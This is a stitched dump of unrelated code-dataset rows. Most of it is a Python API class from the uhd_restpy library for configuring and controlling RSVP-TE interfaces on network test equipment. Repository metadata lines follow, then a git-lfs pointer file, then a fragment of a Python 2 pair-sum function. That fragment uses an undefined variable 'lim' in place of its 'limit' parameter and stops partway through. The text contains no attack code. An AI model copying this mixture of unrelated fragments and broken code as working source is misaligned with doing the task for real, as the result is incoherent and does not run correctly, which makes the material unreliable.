return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HelloTimeoutMultiplier']))
@property
def InitialSequenceNumber(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Initial Sequence Number
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['InitialSequenceNumber']))
@property
def LabelReqRefCount(self):
# type: () -> int
"""
Returns
-------
- number: Number of Label Req in RSVP-TE DG
"""
return self._get_attribute(self._SDM_ATT_MAP['LabelReqRefCount'])
@LabelReqRefCount.setter
def LabelReqRefCount(self, value):
# type: (int) -> None
self._set_attribute(self._SDM_ATT_MAP['LabelReqRefCount'], value)
@property
def LabelSpaceEnd(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Label Space End
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['LabelSpaceEnd']))
@property
def LabelSpaceStart(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Label Space Start
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['LabelSpaceStart']))
@property
def Multiplier(self):
# type: () -> int
"""
Returns
-------
- number: Number of layer instances per parent instance (multiplier)
"""
return self._get_attribute(self._SDM_ATT_MAP['Multiplier'])
@Multiplier.setter
def Multiplier(self, value):
# type: (int) -> None
self._set_attribute(self._SDM_ATT_MAP['Multiplier'], value)
@property
def Name(self):
# type: () -> str
"""
Returns
-------
- str: Name of NGPF element, guaranteed to be unique in Scenario
"""
return self._get_attribute(self._SDM_ATT_MAP['Name'])
@Name.setter
def Name(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['Name'], value)
@property
def NumberOfRestarts(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Number of Restarts
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['NumberOfRestarts']))
@property
def OurIp(self):
# type: () -> List[str]
"""
Returns
-------
- list(str): Local IP
"""
return self._get_attribute(self._SDM_ATT_MAP['OurIp'])
@property
def RecoveryTime(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Recovery Time (ms)
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['RecoveryTime']))
@property
def RestartStartTime(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Restart Start Time (ms)
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['RestartStartTime']))
@property
def RestartUpTime(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Restart Up Time (ms)
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['RestartUpTime']))
@property
def SessionStatus(self):
# type: () -> List[str]
"""
Returns
-------
- list(str[down | notStarted | up]): Current state of protocol session: Not Started - session negotiation not started, the session is not active yet. Down - actively trying to bring up a protocol session, but negotiation is didn't successfully complete (yet). Up - session came up successfully.
"""
return self._get_attribute(self._SDM_ATT_MAP['SessionStatus'])
@property
def StackedLayers(self):
# type: () -> List[str]
"""
Returns
-------
- list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*]): List of secondary (many to one) child layer protocols
"""
return self._get_attribute(self._SDM_ATT_MAP['StackedLayers'])
@StackedLayers.setter
def StackedLayers(self, value):
# type: (List[str]) -> None
self._set_attribute(self._SDM_ATT_MAP['StackedLayers'], value)
@property
def StateCounts(self):
"""
Returns
-------
- dict(total:number,notStarted:number,down:number,up:number): A list of values that indicates the total number of sessions, the number of sessions not started, the number of sessions down and the number of sessions that are up
"""
return self._get_attribute(self._SDM_ATT_MAP['StateCounts'])
@property
def Status(self):
# type: () -> str
"""
Returns
-------
- str(configured | error | mixed | notStarted | started | starting | stopping): Running status of associated network element. Once in Started state, protocol sessions will begin to negotiate.
"""
return self._get_attribute(self._SDM_ATT_MAP['Status'])
@property
def SummaryRefreshInterval(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Summary Refresh Interval (ms)
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SummaryRefreshInterval']))
@property
def UseSameAuthenticationKeyForPeer(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Use Same Authentication Key for Peer
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UseSameAuthenticationKeyForPeer']))
@property
def UsingGatewayIp(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Using Gateway IP
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['UsingGatewayIp']))
def update(self, ConnectedVia=None, LabelReqRefCount=None, Multiplier=None, Name=None, StackedLayers=None):
# type: (List[str], int, int, str, List[str]) -> RsvpteIf
"""Updates rsvpteIf resource on the server.
This method has some named parameters with a type: obj (Multivalue).
The Multivalue class has documentation that details the possible values for those named parameters.
Args
----
- ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of layers this layer is used to connect with to the wire.
- LabelReqRefCount (number): Number of Label Req in RSVP-TE DG
- Multiplier (number): Number of layer instances per parent instance (multiplier)
- Name (str): Name of NGPF element, guaranteed to be unique in Scenario
- StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of secondary (many to one) child layer protocols
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
def add(self, ConnectedVia=None, LabelReqRefCount=None, Multiplier=None, Name=None, StackedLayers=None):
# type: (List[str], int, int, str, List[str]) -> RsvpteIf
"""Adds a new rsvpteIf resource on the server and adds it to the container.
Args
----
- ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of layers this layer is used to connect with to the wire.
- LabelReqRefCount (number): Number of Label Req in RSVP-TE DG
- Multiplier (number): Number of layer instances per parent instance (multiplier)
- Name (str): Name of NGPF element, guaranteed to be unique in Scenario
- StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of secondary (many to one) child layer protocols
Returns
-------
- self: This instance with all currently retrieved rsvpteIf resources using find and the newly added rsvpteIf resources available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))
def remove(self):
"""Deletes all the contained rsvpteIf resources in this instance from the server.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
self._delete()
def find(self, ConnectedVia=None, Count=None, DescriptiveName=None, Errors=None, LabelReqRefCount=None, Multiplier=None, Name=None, OurIp=None, SessionStatus=None, StackedLayers=None, StateCounts=None, Status=None):
"""Finds and retrieves rsvpteIf resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve rsvpteIf resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all rsvpteIf resources from the server.
Args
----
- ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of layers this layer is used to connect with to the wire.
- Count (number): Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.
- DescriptiveName (str): Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.
- Errors (list(dict(arg1:str[None | /api/v1/sessions/1/ixnetwork//.../*],arg2:list[str]))): A list of errors that have occurred
- LabelReqRefCount (number): Number of Label Req in RSVP-TE DG
- Multiplier (number): Number of layer instances per parent instance (multiplier)
- Name (str): Name of NGPF element, guaranteed to be unique in Scenario
- OurIp (list(str)): Local IP
- SessionStatus (list(str[down | notStarted | up])): Current state of protocol session: Not Started - session negotiation not started, the session is not active yet. Down - actively trying to bring up a protocol session, but negotiation is didn't successfully complete (yet). Up - session came up successfully.
- StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of secondary (many to one) child layer protocols
- StateCounts (dict(total:number,notStarted:number,down:number,up:number)): A list of values that indicates the total number of sessions, the number of sessions not started, the number of sessions down and the number of sessions that are up
- Status (str(configured | error | mixed | notStarted | started | starting | stopping)): Running status of associated network element. Once in Started state, protocol sessions will begin to negotiate.
Returns
-------
- self: This instance with matching rsvpteIf resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of rsvpteIf data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the rsvpteIf resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
def Abort(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the abort operation on the server.
Abort CPF control plane (equals to demote to kUnconfigured state).
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
abort(async_operation=bool)
---------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
abort(SessionIndices=list, async_operation=bool)
------------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
abort(SessionIndices=string, async_operation=bool)
--------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('abort', payload=payload, response_object=None)
def GetLearnedInfo(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[List[str], None]
"""Executes the getLearnedInfo operation on the server.
Get Learned Info
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
getLearnedInfo(async_operation=bool)
------------------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
getLearnedInfo(SessionIndices=list, async_operation=bool)
---------------------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
getLearnedInfo(SessionIndices=string, async_operation=bool)
-----------------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
getLearnedInfo(Arg2=list, async_operation=bool)list
---------------------------------------------------
- Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('getLearnedInfo', payload=payload, response_object=None)
def RestartDown(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the restartDown operation on the server.
Stop and start interfaces and sessions that are in Down state.
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
restartDown(async_operation=bool)
---------------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
restartDown(SessionIndices=list, async_operation=bool)
------------------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
restartDown(SessionIndices=string, async_operation=bool)
--------------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('restartDown', payload=payload, response_object=None)
def RestartNeighbor(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[List[str], None]
"""Executes the restartNeighbor operation on the server.
Restart Neighbor
restartNeighbor(Arg2=list, async_operation=bool)list
----------------------------------------------------
- Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('restartNeighbor', payload=payload, response_object=None)
def RsvpRestartNeighbor(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the rsvpRestartNeighbor operation on the server.
Gracefully restart selected Neighbors
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
rsvpRestartNeighbor(async_operation=bool)
-----------------------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
rsvpRestartNeighbor(SessionIndices=list, async_operation=bool)
--------------------------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
rsvpRestartNeighbor(SessionIndices=string, async_operation=bool)
----------------------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('rsvpRestartNeighbor', payload=payload, response_object=None)
def RsvpResumeHello(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the rsvpResumeHello operation on the server.
Resume sending Hello messages from selected Neighbors
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
rsvpResumeHello(async_operation=bool)
-------------------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
rsvpResumeHello(SessionIndices=list, async_operation=bool)
----------------------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
rsvpResumeHello(SessionIndices=string, async_operation=bool)
------------------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('rsvpResumeHello', payload=payload, response_object=None)
def RsvpStartSRefresh(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the rsvpStartSRefresh operation on the server.
Start sending SRefresh messages from selected Neighbors
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
rsvpStartSRefresh(async_operation=bool)
---------------------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
rsvpStartSRefresh(SessionIndices=list, async_operation=bool)
------------------------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
rsvpStartSRefresh(SessionIndices=string, async_operation=bool)
--------------------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('rsvpStartSRefresh', payload=payload, response_object=None)
def RsvpStopHello(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the rsvpStopHello operation on the server.
Stop sending Hello messages from selected Neighbors
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
rsvpStopHello(async_operation=bool)
-----------------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
rsvpStopHello(SessionIndices=list, async_operation=bool)
--------------------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
rsvpStopHello(SessionIndices=string, async_operation=bool)
----------------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('rsvpStopHello', payload=payload, response_object=None)
def RsvpStopSRefresh(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the rsvpStopSRefresh operation on the server.
Stop sending SRefresh messages from selected Neighbors
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
rsvpStopSRefresh(async_operation=bool)
--------------------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
rsvpStopSRefresh(SessionIndices=list, async_operation=bool)
-----------------------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
rsvpStopSRefresh(SessionIndices=string, async_operation=bool)
-------------------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('rsvpStopSRefresh', payload=payload, response_object=None)
def Start(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the start operation on the server.
Start CPF control plane (equals to promote to negotiated state).
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
start(async_operation=bool)
---------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
start(SessionIndices=list, async_operation=bool)
------------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
start(SessionIndices=string, async_operation=bool)
--------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('start', payload=payload, response_object=None)
def StartHello(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[List[str], None]
"""Executes the startHello operation on the server.
Start Hello
startHello(Arg2=list, async_operation=bool)list
-----------------------------------------------
- Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('startHello', payload=payload, response_object=None)
def StartSRefresh(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[List[str], None]
"""Executes the startSRefresh operation on the server.
Start SRefresh
startSRefresh(Arg2=list, async_operation=bool)list
--------------------------------------------------
- Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('startSRefresh', payload=payload, response_object=None)
def Stop(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the stop operation on the server.
Stop CPF control plane (equals to demote to PreValidated-DoDDone state).
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
stop(async_operation=bool)
--------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
stop(SessionIndices=list, async_operation=bool)
-----------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
stop(SessionIndices=string, async_operation=bool)
-------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('stop', payload=payload, response_object=None)
def StopHello(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[List[str], None]
"""Executes the stopHello operation on the server.
Stop Hello
stopHello(Arg2=list, async_operation=bool)list
----------------------------------------------
- Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('stopHello', payload=payload, response_object=None)
def StopSRefresh(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[List[str], None]
"""Executes the stopSRefresh operation on the server.
Stop SRefresh
stopSRefresh(Arg2=list, async_operation=bool)list
-------------------------------------------------
- Arg2 (list(number)): List of indices into the protocol plugin. An empty list indicates all instances in the plugin.
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('stopSRefresh', payload=payload, response_object=None)
def get_device_ids(self, PortNames=None, Active=None, ActualRestartTime=None, AdvertisedRestartTime=None, AuthenticationAlgorithm=None, AuthenticationKeyForReceivedPackets=None, AuthenticationKeyForSentPackets=None, AuthenticationKeyIdentifier=None, AutoGenerateAuthenticationKeyIdentifier=None, BundleMessageThresholdTime=None, CheckIntegrityForReceivedPackets=None, DutIp=None, EnableBfdRegistration=None, EnableBundleMessageSending=None, EnableBundleMessageThresholdTimer=None, EnableGracefulRestartHelperMode=None, EnableGracefulRestartRestartingMode=None, EnableHelloExtension=None, EnableRefreshReduction=None, GenerateSequenceNumberBasedOnRealTime=None, HandshakeRequired=None, HelloInterval=None, HelloTimeoutMultiplier=None, InitialSequenceNumber=None, LabelSpaceEnd=None, LabelSpaceStart=None, NumberOfRestarts=None, RecoveryTime=None, RestartStartTime=None, RestartUpTime=None, SummaryRefreshInterval=None, UseSameAuthenticationKeyForPeer=None, UsingGatewayIp=None):
"""Base class infrastructure that gets a list of rsvpteIf device ids encapsulated by this object.
Use the optional regex parameters in the method to refine the list of device ids encapsulated by this object.
Args
----
- PortNames (str): optional regex of port names
- Active (str): optional regex of active
- ActualRestartTime (str): optional regex of actualRestartTime
- AdvertisedRestartTime (str): optional regex of advertisedRestartTime
- AuthenticationAlgorithm (str): optional regex of authenticationAlgorithm
- AuthenticationKeyForReceivedPackets (str): optional regex of authenticationKeyForReceivedPackets
- AuthenticationKeyForSentPackets (str): optional regex of authenticationKeyForSentPackets
- AuthenticationKeyIdentifier (str): optional regex of authenticationKeyIdentifier
- AutoGenerateAuthenticationKeyIdentifier (str): optional regex of autoGenerateAuthenticationKeyIdentifier
- BundleMessageThresholdTime (str): optional regex of bundleMessageThresholdTime
- CheckIntegrityForReceivedPackets (str): optional regex of checkIntegrityForReceivedPackets
- DutIp (str): optional regex of dutIp
- EnableBfdRegistration (str): optional regex of enableBfdRegistration
- EnableBundleMessageSending (str): optional regex of enableBundleMessageSending
- EnableBundleMessageThresholdTimer (str): optional regex of enableBundleMessageThresholdTimer
- EnableGracefulRestartHelperMode (str): optional regex of enableGracefulRestartHelperMode
- EnableGracefulRestartRestartingMode (str): optional regex of enableGracefulRestartRestartingMode
- EnableHelloExtension (str): optional regex of enableHelloExtension
- EnableRefreshReduction (str): optional regex of enableRefreshReduction
- GenerateSequenceNumberBasedOnRealTime (str): optional regex of generateSequenceNumberBasedOnRealTime
- HandshakeRequired (str): optional regex of handshakeRequired
- HelloInterval (str): optional regex of helloInterval
- HelloTimeoutMultiplier (str): optional regex of helloTimeoutMultiplier
- InitialSequenceNumber (str): optional regex of initialSequenceNumber
- LabelSpaceEnd (str): optional regex of labelSpaceEnd
- LabelSpaceStart (str): optional regex of labelSpaceStart
- NumberOfRestarts (str): optional regex of numberOfRestarts
- RecoveryTime (str): optional regex of recoveryTime
- RestartStartTime (str): optional regex of restartStartTime
- RestartUpTime (str): optional regex of restartUpTime
- SummaryRefreshInterval (str): optional regex of summaryRefreshInterval
- UseSameAuthenticationKeyForPeer (str): optional regex of useSameAuthenticationKeyForPeer
- UsingGatewayIp (str): optional regex of usingGatewayIp
Returns
-------
- list(int): A list of device ids that meets the regex criteria provided in the method parameters
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._get_ngpf_device_ids(locals())
| [
"[email protected]"
] | |
5b2cd57f8e2194ec3817a24a6915598c622ca1b2 | 55c250525bd7198ac905b1f2f86d16a44f73e03a | /Python/Projects/sphinx/sphinx/sphinx/search/nl.py | 485c32c00bfbebd3c13c6fc237cc638855547bc0 | [
"LicenseRef-scancode-other-permissive",
"BSD-3-Clause"
] | permissive | NateWeiler/Resources | 213d18ba86f7cc9d845741b8571b9e2c2c6be916 | bd4a8a82a3e83a381c97d19e5df42cbababfc66c | refs/heads/master | 2023-09-03T17:50:31.937137 | 2023-08-28T23:50:57 | 2023-08-28T23:50:57 | 267,368,545 | 2 | 1 | null | 2022-09-08T15:20:18 | 2020-05-27T16:18:17 | null | UTF-8 | Python | false | false | 130 | py | version https://git-lfs.github.com/spec/v1
oid sha256:691f5261422e51d9e03272aae70ab30a0ad6712d65759be6a8f9a41bd904a565
size 21944
| [
"[email protected]"
] | |
ed8e7e07c105152f5bc9ba5fcc02fe65b2194e23 | b0b9f05bcfb0e366955f70753bcbd0b7fc997e7a | /pairsWithSpecificSum.py | de68f3bf37ad2534a22358946844b725ef7cd5cc | [] | no_license | mave5/pmarp | ae691e8fb3d7dc4cd51928ec240b077f09b27774 | 52aa9919e6384226ba10242144ceb5801a995071 | refs/heads/master | 2022-10-20T12:52:08.587884 | 2017-10-23T00:19:36 | 2017-10-23T00:19:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 698 | py |
# Merging 2 Packages
def get_indices_of_item_wights(arr, limit):
if len(arr)==1:
return []
#elif (len(arr)==2) and (arr[0]+arr[1]==limit):
#print arr[0],arr[1],arr[0]+arr[1]
#return []
comps={}
for i in range(0,len(arr)):
w=arr[i]
j=comps.get(lim-w)
if j is not None:
return [j,i]
else:
